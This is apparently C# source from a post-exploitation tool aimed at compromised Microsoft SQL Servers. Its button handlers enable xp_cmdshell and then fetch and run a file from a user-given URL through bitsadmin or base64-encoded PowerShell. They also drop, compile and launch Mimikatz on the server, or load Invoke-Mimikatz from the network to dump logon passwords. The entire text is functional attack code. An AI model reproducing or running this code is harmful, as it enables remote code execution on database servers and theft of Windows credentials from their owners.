private void BtnConvert_OnClick(object sender, RoutedEventArgs e) { txtBase64.Text = EncodeBase64.ConvertTextToBase64(txtClearText.Text); }
private void btnDownloadExecute_Click(object sender, RoutedEventArgs e) { var isActivated = cmdControl.isActivated; var isExecuted = cmdControl.isExecuted; if (isActivated == false && isExecuted == false) { var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() }; try { Dispatcher.Invoke((Action) delegate { enableXpCmdShell.XpCmdShellStatus(); txtStatus.AppendText(enableXpCmdShell.Result); var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2"); var contains = enableXpCmdShell.Result.Contains(cmdLandResult); if (contains == true) { isActivated = true; isExecuted = true; } }); } catch (Exception) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(enableXpCmdShell.CmdException); }); } } if (isExecuted == true && isActivated == true) { if (rdBits.IsChecked == true) { try { if (!string.IsNullOrEmpty(txtUrl.Text) && !string.IsNullOrEmpty(txtSaveLocation.Text)) { var _execCode = string.Empty; Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _execCode += "USE [master]\r\n"; _execCode += "EXEC xp_cmdshell '\"net start BITS\"';\r\n"; txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload1")}"); RevConn(_execCode, 0); _execCode += "USE [master]\r\n"; _execCode += "EXEC xp_cmdshell '\"bitsadmin /transfer WarSQLiJob /download /priority normal " + txtUrl.Text + " " + txtSaveLocation.Text + "\"';\r\n"; txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload2")}"); RevConn(_execCode, 0); _execCode += "USE [master]\r\n"; _execCode += "EXEC xp_cmdshell '\"" + txtSaveLocation.Text + "\"';\r\n"; txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload3")}"); RevConn(_execCode, 0); }); } } catch (Exception exp) { Dispatcher.Invoke((Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } } else { Dispatcher.Invoke((Action) delegate { var clearText = "(new-object System.Net.WebClient).DownloadFile('" + txtUrl.Text + "', '" + txtSaveLocation.Text + "')"; clearText = EncodeBase64.ConvertTextToBase64(clearText); var _execCode = string.Empty; _execCode += "EXEC xp_cmdshell '" + clearText + "'"; txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}"); RevConn(_execCode, 1); _execCode = string.Empty; _execCode += "EXEC xp_cmdshell '" + txtSaveLocation.Text + "'\r\n"; txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload3")}"); RevConn(_execCode, 0); }); } } }
private void btnRun_Click(object sender, RoutedEventArgs e) { var isActivated = cmdControl.isActivated; var isExecuted = cmdControl.isExecuted; if (isActivated == false && isExecuted == false) { var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() }; try { Dispatcher.Invoke((Action) delegate { enableXpCmdShell.XpCmdShellStatus(); txtStatus.AppendText(enableXpCmdShell.Result); var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2"); var contains = enableXpCmdShell.Result.Contains(cmdLandResult); if (contains == true) { isActivated = true; isExecuted = true; } }); } catch (Exception) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(enableXpCmdShell.CmdException); }); } } if (isExecuted == true && isActivated == true) { if (rdLocal.IsChecked == true) { var savedFileNAme = string.Empty; var mimiBinary = File.ReadAllBytes(@"Scanner\Mimikatz\1.txt"); try { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString(); _postExploitation.CreateBinaryTable(); txtStatus.AppendText(_postExploitation.ExploitResult); _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString(); _postExploitation.BinaryData = mimiBinary; _postExploitation.InsertBinaryData(); txtStatus.AppendText(_postExploitation.ExploitResult); }); } catch (Exception exp) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } try { _postExploitation.ExploitCode = string.Empty; var rnd = new Random(); var chr = "0123456789ABCDEFGHIJKLMNOPRSTUVWXYZ".ToCharArray(); var randomFileName = string.Empty; for (int i = 0; i < 12; i++) { randomFileName += chr[rnd.Next(0, chr.Length - 1)].ToString(); } var extension = "txt"; _postExploitation.ExploitCode += "DECLARE @cmd VARCHAR(8000);"; _postExploitation.ExploitCode += "SET @cmd = 'bcp.exe \"SELECT CAST(binaryTable AS VARCHAR(MAX)) FROM WarSQLiTemp\" queryout \"C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension + "\" -c -T';"; _postExploitation.ExploitCode += "EXEC xp_cmdshell @cmd;"; Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString(); _postExploitation.RunExploit(); txtStatus.AppendText(_postExploitation.ExploitResult); txtStatus.AppendText("File Saved: C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension); savedFileNAme = "C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension; }); } catch (Exception exp) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } try { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString(); _postExploitation.RemoveTempTable(); txtStatus.AppendText(_postExploitation.ExploitResult); }); } catch (Exception exp) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } try { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _postExploitation.ExploitCode = string.Empty; _postExploitation.ExploitCode += "EXEC xp_cmdshell 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:C:\\Users\\MSSQLSERVER\\eyup.exe " + savedFileNAme + "';"; _postExploitation.RunExploit(); txtStatus.AppendText(_postExploitation.ExploitResult); }); Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _postExploitation.ExploitCode = string.Empty; _postExploitation.ExploitCode += "EXEC xp_cmdshell 'cmd.exe /c C:\\Users\\MSSQLSERVER\\eyup.exe';"; _postExploitation.RunExploit(); txtStatus.AppendText(_postExploitation.ExploitResult); }); } catch (Exception exp) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } } else { try { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString(); var sendMimiText = "IEX (New-Object Net.WebClient).DownloadString('" + txtUrl.Text + "'); Invoke-Mimikatz -Command \"privilege::debug sekurlsa::logonPasswords exit\""; var psBs64 = EncodeBase64.ConvertTextToBase64(sendMimiText); _postExploitation.ExploitCode = string.Empty; _postExploitation.ExploitCode += "EXEC xp_cmdshell '" + psBs64 + "';"; _postExploitation.RunExploit(); txtStatus.AppendText(_postExploitation.ExploitResult); }); } catch (Exception exp) { Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); }); } } } }